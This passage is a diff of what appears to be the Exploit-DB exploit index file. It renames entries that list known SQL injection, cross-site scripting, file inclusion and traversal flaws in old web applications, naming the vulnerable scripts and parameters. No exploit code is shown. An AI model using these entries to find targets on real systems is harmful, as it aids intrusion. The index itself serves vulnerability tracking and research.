Scripting",2004-03-15,JeiAr,php,webapps,0 -23820,platforms/php/webapps/23820.txt,"Phorum 3.x - profile.php target Parameter Cross-Site Scripting",2004-03-15,JeiAr,php,webapps,0 -23821,platforms/php/webapps/23821.php,"phpBB 1.x/2.0.x - search.php search_results Parameter SQL Injection",2004-01-04,pokleyzz,php,webapps,0 +23820,platforms/php/webapps/23820.txt,"Phorum 3.x - 'profile.php?target' Cross-Site Scripting",2004-03-15,JeiAr,php,webapps,0 +23821,platforms/php/webapps/23821.php,"phpBB 1.x/2.0.x - 'search.php?search_results' SQL Injection",2004-01-04,pokleyzz,php,webapps,0 23822,platforms/php/webapps/23822.txt,"vBulletin 3.0 - forumdisplay.php Cross-Site Scripting",2004-03-16,JeiAr,php,webapps,0 23823,platforms/php/webapps/23823.txt,"vBulletin 3.0 - showthread.php Cross-Site Scripting",2004-03-16,JeiAr,php,webapps,0 -23824,platforms/php/webapps/23824.txt,"Mambo Open Source 4.5 - 'index.php' Multiple Parameter Cross-Site Scripting",2004-03-16,JeiAr,php,webapps,0 +23824,platforms/php/webapps/23824.txt,"Mambo Open Source 4.5 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2004-03-16,JeiAr,php,webapps,0 23825,platforms/php/webapps/23825.txt,"Mambo Open Source 4.5 - 'index.php' mos_change_template Parameter Cross-Site Scripting",2004-03-16,JeiAr,php,webapps,0 23828,platforms/php/webapps/23828.txt,"e107 1.0.1 - Arbitrary JavaScript Execution (via Cross-Site Request Forgery)",2013-01-02,"Joshua Reynolds",php,webapps,0 23829,platforms/php/webapps/23829.txt,"e107 1.0.2 - SQL Injection (via Cross-Site Request Forgery)",2013-01-02,"Joshua Reynolds",php,webapps,0 @@ -27416,13 +27417,13 @@ id,file,description,date,author,platform,type,port 23834,platforms/php/webapps/23834.txt,"Mambo Open Source 4.5 - 'index.php' SQL Injection",2004-03-16,JeiAr,php,webapps,0 23835,platforms/php/webapps/23835.txt,"PHP-Nuke 6.x/7.0/7.1 - Image Tag Admin Command Execution",2004-03-16,"Janek Vind",php,webapps,0 23843,platforms/php/webapps/23843.txt,"Belchior Foundry VCard 2.8 - Authentication Bypass",2004-03-17,"saudi linux",php,webapps,0 -23844,platforms/php/webapps/23844.txt,"PHP-Nuke Error Manager Module 2.1 - 'error.php language' Parameter Full Path Disclosure",2004-03-18,"Janek Vind",php,webapps,0 -23845,platforms/php/webapps/23845.txt,"PHP-Nuke Error Manager Module 2.1 - 'error.php' Multiple Parameters Cross-Site Scripting",2004-03-18,"Janek Vind",php,webapps,0 +23844,platforms/php/webapps/23844.txt,"PHP-Nuke Error Manager Module 2.1 - 'error.php?language' Full Path Disclosure",2004-03-18,"Janek Vind",php,webapps,0 +23845,platforms/php/webapps/23845.txt,"PHP-Nuke Error Manager Module 2.1 - 'error.php' Multiple Cross-Site Scripting Vulnerabilities",2004-03-18,"Janek Vind",php,webapps,0 23851,platforms/asp/webapps/23851.txt,"Expinion.net Member Management System 2.1 - 'news_view.asp' ID Parameter SQL Injection",2004-03-20,"Manuel Lopez",asp,webapps,0 -23852,platforms/asp/webapps/23852.txt,"Expinion.net Member Management System 2.1 - resend.asp ID Parameter SQL Injection",2004-03-20,"Manuel Lopez",asp,webapps,0 -23853,platforms/asp/webapps/23853.txt,"Expinion.net Member Management System 2.1 - error.asp err Parameter Cross-Site Scripting",2004-03-20,"Manuel Lopez",asp,webapps,0 +23852,platforms/asp/webapps/23852.txt,"Expinion.net Member Management System 2.1 - 'resend.asp?ID' SQL Injection",2004-03-20,"Manuel Lopez",asp,webapps,0 +23853,platforms/asp/webapps/23853.txt,"Expinion.net Member Management System 2.1 - 'error.asp?err' Cross-Site Scripting",2004-03-20,"Manuel Lopez",asp,webapps,0 40401,platforms/php/webapps/40401.txt,"ZineBasic 1.1 - Arbitrary File Disclosure",2016-09-19,bd0rk,php,webapps,80 -23854,platforms/asp/webapps/23854.txt,"Expinion.net Member Management System 2.1 - register.asp err Parameter Cross-Site Scripting",2004-03-20,"Manuel Lopez",asp,webapps,0 +23854,platforms/asp/webapps/23854.txt,"Expinion.net Member Management System 2.1 - 'register.asp?err' Cross-Site Scripting",2004-03-20,"Manuel Lopez",asp,webapps,0 23857,platforms/asp/webapps/23857.txt,"Expinion.net News Manager Lite 2.5 - 'comment_add.asp' Cross-Site Scripting",2004-03-20,"Manuel Lopez",asp,webapps,0 23858,platforms/asp/webapps/23858.txt,"Expinion.net News Manager Lite 2.5 - 'search.asp' Cross-Site Scripting",2004-03-20,"Manuel Lopez",asp,webapps,0 23859,platforms/asp/webapps/23859.txt,"Expinion.net News Manager Lite 2.5 - 'category_news_headline.asp' Cross-Site Scripting",2004-03-20,"Manuel Lopez",asp,webapps,0 @@ -27438,11 +27439,11 @@ id,file,description,date,author,platform,type,port 23870,platforms/php/webapps/23870.txt,"PHP-Nuke MS-Analysis Module - HTTP Referrer Field SQL Injection",2004-03-22,"Janek Vind",php,webapps,0 23872,platforms/jsp/webapps/23872.txt,"reget deluxe 3.0 build 121 - Directory Traversal",2004-03-22,snifer,jsp,webapps,0 23875,platforms/windows/webapps/23875.txt,"Trend Micro Interscan VirusWall localweb - Directory Traversal",2004-03-24,"Tri Huynh",windows,webapps,0 -23885,platforms/php/webapps/23885.txt,"PhotoPost PHP Pro 3.x/4.x - showgallery.php Multiple Parameter SQL Injection",2004-03-29,JeiAr,php,webapps,0 +23885,platforms/php/webapps/23885.txt,"PhotoPost PHP Pro 3.x/4.x - 'showgallery.php' Multiple SQL Injections",2004-03-29,JeiAr,php,webapps,0 23886,platforms/windows/webapps/23886.txt,"Simple Web Server 2.3-rc1 - Directory Traversal",2013-01-04,"CwG GeNiuS",windows,webapps,0 23888,platforms/php/webapps/23888.txt,"MyBB Profile Wii Friend Code - Multiple Vulnerabilities",2013-01-04,Ichi,php,webapps,0 23890,platforms/cgi/webapps/23890.txt,"Fresh Guest Book 1.0/2.x - HTML Injection",2004-03-29,"koi8-r Shelz",cgi,webapps,0 -23891,platforms/asp/webapps/23891.txt,"Alan Ward A-CART 2.0 - category.asp catcode Parameter SQL Injection (2)",2004-03-29,"Manuel Lopez",asp,webapps,0 +23891,platforms/asp/webapps/23891.txt,"Alan Ward A-CART 2.0 - 'category.asp?catcode' SQL Injection (2)",2004-03-29,"Manuel Lopez",asp,webapps,0 23894,platforms/cgi/webapps/23894.txt,"Cloisterblog 1.2.2 - Journal.pl Directory Traversal",2004-03-29,Dotho,cgi,webapps,0 23895,platforms/asp/webapps/23895.txt,"Interchange 4.8.x/5.0 - Remote Information Disclosure",2004-03-30,anonymous,asp,webapps,0 23897,platforms/cgi/webapps/23897.txt,"LinBit Technologies LINBOX Officeserver - Remote Authentication Bypass",2004-03-30,"Martin Eiszner",cgi,webapps,0 @@ -27461,7 +27462,7 @@ id,file,description,date,author,platform,type,port 23932,platforms/php/webapps/23932.txt,"NukeCalendar 1.1.a - eid Parameter Cross-Site Scripting",2004-04-08,"Janek Vind",php,webapps,0 23933,platforms/php/webapps/23933.txt,"NukeCalendar 1.1.a - eid Parameter SQL Injection",2004-04-08,"Janek Vind",php,webapps,0 23934,platforms/php/webapps/23934.txt,"AzDGDatingLite 2.1.1 - 'index.php' language Parameter Cross-Site Scripting",2004-04-07,"Janek Vind",php,webapps,0 -23935,platforms/php/webapps/23935.txt,"AzDGDatingLite 2.1.1 - view.php id Parameter Cross-Site Scripting",2004-04-07,"Janek Vind",php,webapps,0 +23935,platforms/php/webapps/23935.txt,"AzDGDatingLite 2.1.1 - 'view.php?id' Cross-Site Scripting",2004-04-07,"Janek Vind",php,webapps,0 23937,platforms/cgi/webapps/23937.txt,"1st Class Mail Server 4.0 1 - viewmail.tagz Cross-Site Scripting",2004-04-08,dr_insane,cgi,webapps,0 23938,platforms/cgi/webapps/23938.txt,"1st Class Mail Server 4.0 1 - Index Cross-Site Scripting",2004-04-08,dr_insane,cgi,webapps,0 23939,platforms/cgi/webapps/23939.txt,"1st Class Mail Server 4.0 1 - members.tagz Cross-Site Scripting",2004-04-08,dr_insane,cgi,webapps,0 @@ -27471,11 +27472,11 @@ id,file,description,date,author,platform,type,port 23947,platforms/php/webapps/23947.txt,"TikiWiki Project 1.8 - 'tiki-switch_theme.php' theme Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 23948,platforms/php/webapps/23948.txt,"TikiWiki Project 1.8 - 'img/wiki_up' Arbitrary File Upload",2004-04-12,JeiAr,php,webapps,0 23949,platforms/php/webapps/23949.txt,"TikiWiki Project 1.8 - 'tiki-map.phtml' Traversal Arbitrary File / Directory Enumeration",2004-04-12,JeiAr,php,webapps,0 -23950,platforms/php/webapps/23950.txt,"TikiWiki Project 1.8 - User Profile Multiple Option Remote Code Injection",2004-04-12,JeiAr,php,webapps,0 -23951,platforms/php/webapps/23951.txt,"TikiWiki Project 1.8 - Add Site Multiple Options Remote Code Injection",2004-04-12,JeiAr,php,webapps,0 +23950,platforms/php/webapps/23950.txt,"TikiWiki Project 1.8 - User Profile Multiple Option Remote Code Injections",2004-04-12,JeiAr,php,webapps,0 +23951,platforms/php/webapps/23951.txt,"TikiWiki Project 1.8 - Add Site Multiple Options Remote Code Injections",2004-04-12,JeiAr,php,webapps,0 23952,platforms/php/webapps/23952.txt,"TikiWiki Project 1.8 - 'categorize.php' Direct Request Full Path Disclosure",2004-04-12,JeiAr,php,webapps,0 -23953,platforms/php/webapps/23953.txt,"TikiWiki Project 1.8 - 'messu-mailbox.php' Multiple Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 -23954,platforms/php/webapps/23954.txt,"TikiWiki Project 1.8 - 'messu-read.php' Multiple Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 +23953,platforms/php/webapps/23953.txt,"TikiWiki Project 1.8 - 'messu-mailbox.php' Multiple Cross-Site Scripting Vulnerabilities",2004-04-12,JeiAr,php,webapps,0 +23954,platforms/php/webapps/23954.txt,"TikiWiki Project 1.8 - 'messu-read.php' Multiple Cross-Site Scripting Vulnerabilities",2004-04-12,JeiAr,php,webapps,0 23955,platforms/php/webapps/23955.txt,"TikiWiki Project 1.8 - 'tiki-read_article.php' articleId Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 23956,platforms/php/webapps/23956.txt,"TikiWiki Project 1.8 - 'tiki-browse_categories.php' parentId Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 23957,platforms/php/webapps/23957.txt,"TikiWiki Project 1.8 - 'tiki-index.php' comments_threshold Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 @@ -27486,64 +27487,64 @@ id,file,description,date,author,platform,type,port 23962,platforms/php/webapps/23962.txt,"TikiWiki Project 1.8 - 'tiki-view_chart.php' chartId Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 23963,platforms/php/webapps/23963.txt,"TikiWiki Project 1.8 - 'tiki-usermenu.php' sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 23964,platforms/php/webapps/23964.txt,"TikiWiki Project 1.8 - 'tiki-list_file_gallery.php' sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 -23965,platforms/php/webapps/23965.txt,"TikiWiki Project 1.8 - tiki-directory_ranking.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 -23966,platforms/php/webapps/23966.txt,"TikiWiki Project 1.8 - tiki-browse_categories.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 +23965,platforms/php/webapps/23965.txt,"TikiWiki Project 1.8 - 'tiki-directory_ranking.php?sort_mode' SQL Injection",2004-04-12,JeiAr,php,webapps,0 +23966,platforms/php/webapps/23966.txt,"TikiWiki Project 1.8 - 'tiki-browse_categories.php?sort_mode' SQL Injection",2004-04-12,JeiAr,php,webapps,0 23967,platforms/php/webapps/23967.txt,"E Sms Script - Multiple SQL Injections",2013-01-08,cr4wl3r,php,webapps,0 23968,platforms/asp/webapps/23968.txt,"Advantech Webaccess HMI/SCADA Software - Persistence Cross-Site Scripting",2013-01-08,"SecPod Research",asp,webapps,0 23970,platforms/php/webapps/23970.rb,"WordPress Plugin Google Document Embedder - Arbitrary File Disclosure (Metasploit)",2013-01-08,Metasploit,php,webapps,0 -23971,platforms/php/webapps/23971.txt,"TikiWiki Project 1.8 - tiki-index.php comments_offset & offset Parameter SQL Injections",2004-04-12,JeiAr,php,webapps,0 -23972,platforms/php/webapps/23972.txt,"TikiWiki Project 1.8 - tiki-user_tasks.php offset & sort_mode Parameter SQL Injections",2004-04-12,JeiAr,php,webapps,0 -23973,platforms/php/webapps/23973.txt,"TikiWiki Project 1.8 - tiki-directory_search.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 -23974,platforms/php/webapps/23974.txt,"TikiWiki Project 1.8 - tiki-file_galleries.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 -23975,platforms/php/webapps/23975.txt,"TikiWiki Project 1.8 - tiki-list_faqs.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 -23976,platforms/php/webapps/23976.txt,"TikiWiki Project 1.8 - tiki-list_trackers.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 -23977,platforms/php/webapps/23977.txt,"TikiWiki Project 1.8 - tiki-list_blogs.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 -23978,platforms/php/webapps/23978.txt,"TikiWiki Project 1.8 - tiki-usermenu.php offset Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 -33401,platforms/php/webapps/33401.txt,"Million Pixel Script 3 - 'pa' Parameter Cross-Site Scripting",2009-12-14,bi0,php,webapps,0 -23982,platforms/php/webapps/23982.txt,"TikiWiki Project 1.8 - tiki-list_faqs.php offset Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 -23983,platforms/php/webapps/23983.txt,"TikiWiki Project 1.8 - tiki-list_trackers.php offset Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 -23984,platforms/php/webapps/23984.txt,"TikiWiki Project 1.8 - tiki-list_blogs.php offset Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 +23971,platforms/php/webapps/23971.txt,"TikiWiki Project 1.8 - 'tiki-index.php?comments_offset & offset' SQL Injections",2004-04-12,JeiAr,php,webapps,0 +23972,platforms/php/webapps/23972.txt,"TikiWiki Project 1.8 - 'tiki-user_tasks.php?offset & sort_mode' SQL Injections",2004-04-12,JeiAr,php,webapps,0 +23973,platforms/php/webapps/23973.txt,"TikiWiki Project 1.8 - 'tiki-directory_search.php?sort_mode' SQL Injection",2004-04-12,JeiAr,php,webapps,0 +23974,platforms/php/webapps/23974.txt,"TikiWiki Project 1.8 - 'tiki-file_galleries.php?sort_mode' SQL Injection",2004-04-12,JeiAr,php,webapps,0 +23975,platforms/php/webapps/23975.txt,"TikiWiki Project 1.8 - 'tiki-list_faqs.php?sort_mode' SQL Injection",2004-04-12,JeiAr,php,webapps,0 +23976,platforms/php/webapps/23976.txt,"TikiWiki Project 1.8 - 'tiki-list_trackers.php?sort_mode' SQL Injection",2004-04-12,JeiAr,php,webapps,0 +23977,platforms/php/webapps/23977.txt,"TikiWiki Project 1.8 - 'tiki-list_blogs.php?sort_mode' SQL Injection",2004-04-12,JeiAr,php,webapps,0 +23978,platforms/php/webapps/23978.txt,"TikiWiki Project 1.8 - 'tiki-usermenu.php?offset' SQL Injection",2004-04-12,JeiAr,php,webapps,0 +33401,platforms/php/webapps/33401.txt,"Million Pixel Script 3 - 'pa' Cross-Site Scripting",2009-12-14,bi0,php,webapps,0 +23982,platforms/php/webapps/23982.txt,"TikiWiki Project 1.8 - 'tiki-list_faqs.php?offset' SQL Injection",2004-04-12,JeiAr,php,webapps,0 +23983,platforms/php/webapps/23983.txt,"TikiWiki Project 1.8 - 'tiki-list_trackers.php?offset' SQL Injection",2004-04-12,JeiAr,php,webapps,0 +23984,platforms/php/webapps/23984.txt,"TikiWiki Project 1.8 - 'tiki-list_blogs.php?offset' SQL Injection",2004-04-12,JeiAr,php,webapps,0 23986,platforms/cgi/webapps/23986.txt,"BlackBoard Learning System 5.x/6.0 - Multiple Cross-Site Scripting Vulnerabilities",2004-04-12,"DarC KonQuest",cgi,webapps,0 23988,platforms/php/webapps/23988.txt,"Nuked-klaN 1.x - Multiple Vulnerabilities",2004-04-12,frog,php,webapps,0 23990,platforms/php/webapps/23990.txt,"PHP-Nuke 6.x/7.x - CookieDecode Cross-Site Scripting",2004-04-13,waraxe,php,webapps,0 -23991,platforms/php/webapps/23991.txt,"Tutos 1.1.20031017 - note_overview.php id Parameter SQL Injection",2004-04-13,"François SORIN",php,webapps,0 +23991,platforms/php/webapps/23991.txt,"Tutos 1.1.20031017 - 'note_overview.php?id' SQL Injection",2004-04-13,"François SORIN",php,webapps,0 23998,platforms/php/webapps/23998.txt,"PHP-Nuke 6.x/7.x - Multiple SQL Injections",2004-04-13,waraxe,php,webapps,0 23993,platforms/php/webapps/23993.txt,"WebsiteBaker Addon Concert Calendar 2.1.4 - Multiple Vulnerabilities",2013-01-09,"Stefan Schurtz",php,webapps,0 23994,platforms/php/webapps/23994.txt,"Free Blog 1.0 - Multiple Vulnerabilities",2013-01-09,cr4wl3r,php,webapps,0 23995,platforms/hardware/webapps/23995.txt,"Watson Management Console 4.11.2.G - Directory Traversal",2013-01-09,"Dhruv Shah",hardware,webapps,0 23997,platforms/php/webapps/23997.txt,"WeBid 1.0.6 - SQL Injection",2013-01-09,"Life Wasted",php,webapps,0 24001,platforms/cgi/webapps/24001.txt,"Rhino Software Zaep AntiSpam 2.0 - Cross-Site Scripting",2004-04-14,"Noam Rathaus",cgi,webapps,0 -24003,platforms/php/webapps/24003.txt,"phpBugTracker 0.9 - query.php Multiple Parameter SQL Injection",2004-04-15,JeiAr,php,webapps,0 -24004,platforms/php/webapps/24004.txt,"phpBugTracker 0.9 - bug.php Multiple Parameter SQL Injection",2004-04-15,JeiAr,php,webapps,0 -24005,platforms/php/webapps/24005.txt,"phpBugTracker 0.9 - bug.php Multiple Parameter Cross-Site Scripting",2004-04-15,JeiAr,php,webapps,0 -24006,platforms/php/webapps/24006.txt,"phpBugTracker 0.9 - query.php Multiple Parameter Cross-Site Scripting",2004-04-15,JeiAr,php,webapps,0 -24007,platforms/php/webapps/24007.txt,"phpBugTracker 0.9 - user.php bugid Parameter Cross-Site Scripting",2004-04-15,JeiAr,php,webapps,0 +24003,platforms/php/webapps/24003.txt,"phpBugTracker 0.9 - 'query.php' Multiple SQL Injections",2004-04-15,JeiAr,php,webapps,0 +24004,platforms/php/webapps/24004.txt,"phpBugTracker 0.9 - 'bug.php' Multiple SQL Injections",2004-04-15,JeiAr,php,webapps,0 +24005,platforms/php/webapps/24005.txt,"phpBugTracker 0.9 - 'bug.php' Multiple Cross-Site Scripting Vulnerabilities",2004-04-15,JeiAr,php,webapps,0 +24006,platforms/php/webapps/24006.txt,"phpBugTracker 0.9 - 'query.php' Multiple Cross-Site Scripting Vulnerabilities",2004-04-15,JeiAr,php,webapps,0 +24007,platforms/php/webapps/24007.txt,"phpBugTracker 0.9 - 'user.php?bugid' Cross-Site Scripting",2004-04-15,JeiAr,php,webapps,0 24008,platforms/php/webapps/24008.html,"SCT Campus Pipeline 1.0/2.x/3.x - Email Attachment Script Injection",2004-04-15,"spiffomatic 64",php,webapps,0 24009,platforms/php/webapps/24009.txt,"Gemitel 3.50 - 'affich.php' Remote File Inclusion / Command Injection",2004-04-15,jaguar,php,webapps,0 24016,platforms/php/webapps/24016.txt,"Phorum 3.4.x - Phorum_URIAuth SQL Injection",2004-04-19,"Janek Vind",php,webapps,0 24026,platforms/php/webapps/24026.txt,"phpBB 2.0.x - 'album_portal.php' Remote File Inclusion",2004-04-19,Officerrr,php,webapps,0 -24034,platforms/php/webapps/24034.txt,"PHProfession 2.5 - modules.php offset Parameter SQL Injection",2004-04-23,"Janek Vind",php,webapps,0 +24034,platforms/php/webapps/24034.txt,"PHProfession 2.5 - 'modules.php?offset' SQL Injection",2004-04-23,"Janek Vind",php,webapps,0 24035,platforms/php/webapps/24035.txt,"PHProfession 2.5 - upload.php Direct Request Full Path Disclosure",2004-04-23,"Janek Vind",php,webapps,0 -24036,platforms/php/webapps/24036.txt,"PHProfession 2.5 - modules.php jcode Parameter Cross-Site Scripting",2004-04-23,"Janek Vind",php,webapps,0 -24037,platforms/php/webapps/24037.txt,"PostNuke Phoenix 0.726 - openwindow.php hlpfile Parameter Cross-Site Scripting",2004-04-21,"Janek Vind",php,webapps,0 +24036,platforms/php/webapps/24036.txt,"PHProfession 2.5 - 'modules.php?jcode' Cross-Site Scripting",2004-04-23,"Janek Vind",php,webapps,0 +24037,platforms/php/webapps/24037.txt,"PostNuke Phoenix 0.726 - 'openwindow.php?hlpfile' Cross-Site Scripting",2004-04-21,"Janek Vind",php,webapps,0 24039,platforms/asp/webapps/24039.txt,"NewsTraXor Website Management Script 2.9 Beta - Database Disclosure",2004-04-22,CyberTal0n,asp,webapps,0 24044,platforms/php/webapps/24044.txt,"PHPLiteAdmin 1.9.3 - Remote PHP Code Injection",2013-01-11,L@usch,php,webapps,0 24049,platforms/asp/webapps/24049.txt,"PW New Media Network Modular Site Management System 0.2.1 - Ver.asp Information Disclosure",2004-04-23,CyberTalon,asp,webapps,0 24050,platforms/php/webapps/24050.txt,"Advanced Guestbook 2.2 - Password Parameter SQL Injection",2004-04-23,JQ,php,webapps,0 -24052,platforms/php/webapps/24052.txt,"OpenBB 1.0.x - member.php redirect Parameter Cross-Site Scripting",2004-04-26,JeiAr,php,webapps,0 -24053,platforms/php/webapps/24053.txt,"OpenBB 1.0.x - myhome.php to Parameter Cross-Site Scripting",2004-04-26,JeiAr,php,webapps,0 -24054,platforms/php/webapps/24054.txt,"OpenBB 1.0.x - post.php TID Parameter Cross-Site Scripting",2004-04-26,JeiAr,php,webapps,0 +24052,platforms/php/webapps/24052.txt,"OpenBB 1.0.x - 'member.php?redirect' Cross-Site Scripting",2004-04-26,JeiAr,php,webapps,0 +24053,platforms/php/webapps/24053.txt,"OpenBB 1.0.x - 'myhome.php?to' Cross-Site Scripting",2004-04-26,JeiAr,php,webapps,0 +24054,platforms/php/webapps/24054.txt,"OpenBB 1.0.x - 'post.php?TID' Cross-Site Scripting",2004-04-26,JeiAr,php,webapps,0 24055,platforms/php/webapps/24055.txt,"OpenBB 1.0.x - 'index.php' redirect Parameter Cross-Site Scripting",2004-04-26,JeiAr,php,webapps,0 -24056,platforms/php/webapps/24056.txt,"OpenBB 1.0.x - board.php FID Parameter SQL Injection",2004-04-26,JeiAr,php,webapps,0 -24057,platforms/php/webapps/24057.txt,"OpenBB 1.0.x - member.php Multiple Parameter SQL Injection",2004-04-26,JeiAr,php,webapps,0 -24058,platforms/php/webapps/24058.txt,"OpenBB 1.0.x - search.php q Parameter SQL Injection",2004-04-26,JeiAr,php,webapps,0 -24059,platforms/php/webapps/24059.txt,"OpenBB 1.0.x - post.php Multiple Parameter SQL Injection",2004-04-26,JeiAr,php,webapps,0 +24056,platforms/php/webapps/24056.txt,"OpenBB 1.0.x - 'board.php?FID' SQL Injection",2004-04-26,JeiAr,php,webapps,0 +24057,platforms/php/webapps/24057.txt,"OpenBB 1.0.x - 'member.php' Multiple SQL Injections",2004-04-26,JeiAr,php,webapps,0 +24058,platforms/php/webapps/24058.txt,"OpenBB 1.0.x - 'search.php?q' SQL Injection",2004-04-26,JeiAr,php,webapps,0 +24059,platforms/php/webapps/24059.txt,"OpenBB 1.0.x - 'post.php' Multiple SQL Injections",2004-04-26,JeiAr,php,webapps,0 24060,platforms/php/webapps/24060.txt,"PHP-Nuke 7.2 Multiple Video Gallery Module - SQL Injection",2004-04-26,"k1LL3r B0y",php,webapps,0 24061,platforms/php/webapps/24061.txt,"OpenBB 1.0.x - Private Message Disclosure",2004-04-26,"Manuel Lopez",php,webapps,0 24068,platforms/php/webapps/24068.txt,"SquirrelMail 1.4.x - Folder Name Cross-Site Scripting",2004-04-30,"Alvin Alex",php,webapps,0 24071,platforms/php/webapps/24071.txt,"Moodle 1.1/1.2 - Cross-Site Scripting",2004-04-30,"Bartek Nowotarski",php,webapps,0 24072,platforms/php/webapps/24072.txt,"Coppermine Photo Gallery 1.2.2b - 'menu.inc.php' Cross-Site Scripting",2004-04-30,"Janek Vind",php,webapps,0 -24073,platforms/php/webapps/24073.txt,"Coppermine Photo Gallery 1.2.0 RC4 - 'startdir' Parameter Traversal Arbitrary File Access",2004-04-30,"Janek Vind",php,webapps,0 +24073,platforms/php/webapps/24073.txt,"Coppermine Photo Gallery 1.2.0 RC4 - 'startdir' Traversal Arbitrary File Access",2004-04-30,"Janek Vind",php,webapps,0 24074,platforms/php/webapps/24074.txt,"Coppermine Photo Gallery 1.2.0 RC4 - 'init.inc.php' Remote File Inclusion",2004-04-30,"Janek Vind",php,webapps,0 24075,platforms/php/webapps/24075.txt,"Coppermine Photo Gallery 1.2.2b - 'theme.php' Remote File Inclusion",2004-04-30,"Janek Vind",php,webapps,0 24081,platforms/cfm/webapps/24081.txt,"E-Zone Media FuzeTalk 2.0 - AddUser.cfm Administrator Command Execution",2004-05-05,"Stuart Jamieson",cfm,webapps,0 @@ -27557,21 +27558,21 @@ id,file,description,date,author,platform,type,port 24091,platforms/php/webapps/24091.txt,"PHPX 3.x - 'images.php' Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0 24092,platforms/php/webapps/24092.txt,"PHPX 3.x - 'forums.php' Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0 24094,platforms/cgi/webapps/24094.txt,"SurgeLDAP 1.0 - Web Administration Authentication Bypass",2004-05-05,"GSS IT",cgi,webapps,0 -24099,platforms/php/webapps/24099.txt,"Adam Webb NukeJokes 1.7/2.0 Module - Multiple Parameter Cross-Site Scripting",2004-05-08,"Janek Vind",php,webapps,0 -24100,platforms/php/webapps/24100.txt,"Adam Webb NukeJokes 1.7/2.0 Module - modules.php jokeid Parameter SQL Injection",2004-05-08,"Janek Vind",php,webapps,0 +24099,platforms/php/webapps/24099.txt,"Adam Webb NukeJokes 1.7/2.0 Module - Multiple Cross-Site Scripting Vulnerabilities",2004-05-08,"Janek Vind",php,webapps,0 +24100,platforms/php/webapps/24100.txt,"Adam Webb NukeJokes 1.7/2.0 Module - 'modules.php?jokeid' SQL Injection",2004-05-08,"Janek Vind",php,webapps,0 24104,platforms/php/webapps/24104.txt,"Tutorials Manager 1.0 - Multiple SQL Injections",2004-05-10,"Hillel Himovich",php,webapps,0 24108,platforms/php/webapps/24108.txt,"phpShop 2.0 - SQL Injection",2013-01-14,"By onestree",php,webapps,0 24122,platforms/cgi/webapps/24122.txt,"TurboTrafficTrader C 1.0 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2004-05-17,"Kaloyan Olegov Georgiev",cgi,webapps,0 24124,platforms/php/webapps/24124.txt,"vBulletin 1.0/2.x/3.0 - 'index.php' User Interface Spoofing",2004-05-17,p0rk,php,webapps,0 24126,platforms/php/webapps/24126.txt,"osCommerce 2.x - File Manager Directory Traversal",2004-05-17,Rene,php,webapps,0 -24127,platforms/php/webapps/24127.txt,"PHP-Nuke 6.x/7.x - 'Modpath' Parameter File Inclusion",2004-05-17,waraxe,php,webapps,0 +24127,platforms/php/webapps/24127.txt,"PHP-Nuke 6.x/7.x - 'Modpath' File Inclusion",2004-05-17,waraxe,php,webapps,0 24131,platforms/php/webapps/24131.txt,"dsm light Web file browser 2.0 - Directory Traversal",2004-05-18,Humberto,php,webapps,0 24134,platforms/php/webapps/24134.txt,"CMS snews - SQL Injection",2013-01-15,"By onestree",php,webapps,0 24138,platforms/php/webapps/24138.txt,"e107 Website System 0.5/0.6 - Log.php HTML Injection",2004-05-21,Chinchilla,php,webapps,0 24139,platforms/jsp/webapps/24139.txt,"Liferay Enterprise Portal 1.x/2.x/5.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2004-05-22,"Sandeep Giri",jsp,webapps,0 24151,platforms/php/webapps/24151.txt,"jPORTAL 2.2.1 - 'print.php' SQL Injection",2004-05-28,"Maciek Wierciski",php,webapps,0 24152,platforms/php/webapps/24152.txt,"Land Down Under - BBCode HTML Injection",2004-05-29,"Tim De Gier",php,webapps,0 -24153,platforms/php/webapps/24153.txt,"e107 website system 0.6 - usersettings.php avmsg Parameter Cross-Site Scripting",2004-05-29,"Janek Vind",php,webapps,0 +24153,platforms/php/webapps/24153.txt,"e107 website system 0.6 - 'usersettings.php?avmsg' Cross-Site Scripting",2004-05-29,"Janek Vind",php,webapps,0 24154,platforms/php/webapps/24154.txt,"e107 website system 0.6 - 'email article to a friend' Feature Cross-Site Scripting",2004-05-29,"Janek Vind",php,webapps,0 24186,platforms/php/webapps/24186.txt,"Invision Power Board 1.3 - SSI.php SQL Injection",2004-06-11,JvdR,php,webapps,0 24188,platforms/cgi/webapps/24188.pl,"BlackBoard Learning System 6.0 - Dropbox File Download",2004-06-10,"Maarten Verbeek",cgi,webapps,0 @@ -27591,10 +27592,10 @@ id,file,description,date,author,platform,type,port 24184,platforms/asp/webapps/24184.txt,"AspDotNetStorefront 3.3 - Access Validation",2004-06-09,"Thomas Ryan",asp,webapps,0 24185,platforms/asp/webapps/24185.txt,"AspDotNetStorefront 3.3 - ReturnURL Parameter Cross-Site Scripting",2004-06-09,"Thomas Ryan",asp,webapps,0 24190,platforms/java/webapps/24190.txt,"PHP-Nuke 6.x/7.x FAQ Module - categories Parameter Cross-Site Scripting",2004-06-11,"Janek Vind",java,webapps,0 -24191,platforms/php/webapps/24191.txt,"PHP-Nuke 6.x/7.x Encyclopedia 